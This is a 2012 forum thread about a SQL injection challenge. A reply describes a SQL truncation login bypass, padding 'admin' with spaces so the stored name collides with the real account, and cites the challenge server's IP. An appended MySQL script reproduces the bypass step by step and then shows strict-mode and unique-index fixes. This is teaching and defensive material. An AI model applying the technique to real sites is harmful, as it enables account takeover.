totti93 Posted August 27, 2012
Video solution for https://rstcenter.com/forum/57810-sql-injection-challenge-unknown-level.rst
Sorry for my choppy Romanian, but it's not my native language...
HrN Posted August 27, 2012 (edited)
And if we can log in as any user without using that update, how many points do we get?
It kills me when I see you don't put a character limit on the username at registration...
Edited August 27, 2012 by HrN
totti93 (Author) Posted August 27, 2012
The challenge had its own requirements...
@HrN Give me an example.
HrN Posted August 27, 2012
If you set a 32-character limit in MySQL on the username column and don't check the number of characters entered at registration, I can register something like:
username: admin                           x (admin followed by at least 27 spaces and an x)
password: 123456
When it checks whether the username already exists, it will return false, but when it inserts it into the database, it will only insert the first 32 characters.
And you can log in with any of the passwords, for example:
http://94.249.208.142/login.php
username: admin
password: hrnhrn
or
username: admin
password: 123123
Both are valid.
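The bypass HrN describes is a SQL truncation attack: the registration check compares the full 33-character string, the insert silently cuts it to the column width, and the login comparison then ignores the trailing spaces. The MySQL script below reproduces it end to end and shows the two database-side fixes; it is an added example, not code from the thread or from the challenge site, and the table name `users`, the VARCHAR(32) column, the plaintext password column, the utf8mb4_general_ci collation and the empty sql_mode are all assumptions that mirror 2012-era defaults. On MySQL 5.7+ strict mode is on by default (the insert errors out), and MySQL 8.0's default collation utf8mb4_0900_ai_ci is NO PAD (trailing spaces are significant in comparisons), so on a modern default install the same input would not work; the application-side length check HrN asks for is still the right fix, because neither database default is something the application should rely on.

```sql
-- Added example reproducing the username-truncation login bypass (MySQL).
-- Schema, collation and sql_mode are assumptions, not the challenge's real setup.

-- 2012-era default: no STRICT_TRANS_TABLES, so an over-long value is cut to the
-- column width with a warning instead of being rejected.
SET SESSION sql_mode = '';

CREATE TABLE users (
    id       INT AUTO_INCREMENT PRIMARY KEY,
    username VARCHAR(32) NOT NULL,
    password VARCHAR(64) NOT NULL           -- plaintext only to mirror the thread
) CHARACTER SET utf8mb4 COLLATE utf8mb4_general_ci;   -- a PAD SPACE collation

INSERT INTO users (username, password) VALUES ('admin', 'real-admin-password');

-- Step 1: the registration form's "is this username taken?" check.
-- The candidate is 'admin' + 27 spaces + 'x' (33 characters). The final 'x'
-- makes it differ from the stored 'admin', so the check reports the name as free.
SET @candidate = CONCAT('admin', REPEAT(' ', 27), 'x');
SELECT CHAR_LENGTH(@candidate) AS candidate_len;                        -- 33
SELECT COUNT(*) AS already_taken FROM users WHERE username = @candidate; -- 0

-- Step 2: the insert. Only the first 32 characters fit, so the 'x' is dropped
-- and 'admin' followed by 27 spaces is stored (warning 1265, not an error).
INSERT INTO users (username, password) VALUES (@candidate, '123456');
SHOW WARNINGS;

-- Step 3: login. Under a PAD SPACE collation trailing spaces are ignored in
-- comparisons, so WHERE username = 'admin' now matches two rows.
SELECT id, CONCAT('[', username, ']') AS stored, CHAR_LENGTH(username) AS len
FROM users
WHERE username = 'admin';
-- id 1: [admin]                             len 5   (the real account)
-- id 2: [admin                           ]  len 32  (the attacker's row)

-- The attacker's password is accepted for the username 'admin'.
SELECT id FROM users WHERE username = 'admin' AND password = '123456';   -- id 2

-- Fix 1: strict mode turns the truncating insert into an error
-- (ERROR 1406: Data too long for column 'username').
SET SESSION sql_mode = 'STRICT_TRANS_TABLES';
INSERT INTO users (username, password) VALUES (@candidate, 'again');     -- fails

-- Fix 2: a unique index. It uses the same PAD SPACE comparison, so even a
-- value that fits the column, 'admin' plus one space, is a duplicate of 'admin'.
DELETE FROM users WHERE username = 'admin' AND id <> 1;   -- drop the attacker's row first
ALTER TABLE users ADD UNIQUE INDEX ux_username (username);
INSERT INTO users (username, password) VALUES ('admin ', 'x');
-- fails: ERROR 1062: Duplicate entry 'admin ' for key 'users.ux_username'
```

Run it in a scratch database; the SELECT after step 3 is the whole story, since it shows one username resolving to two rows with two different passwords. The two ALTER/SET fixes stop the insert at the database, but the registration handler should still reject any username longer than the column (and compare the trimmed value) before it ever reaches MySQL.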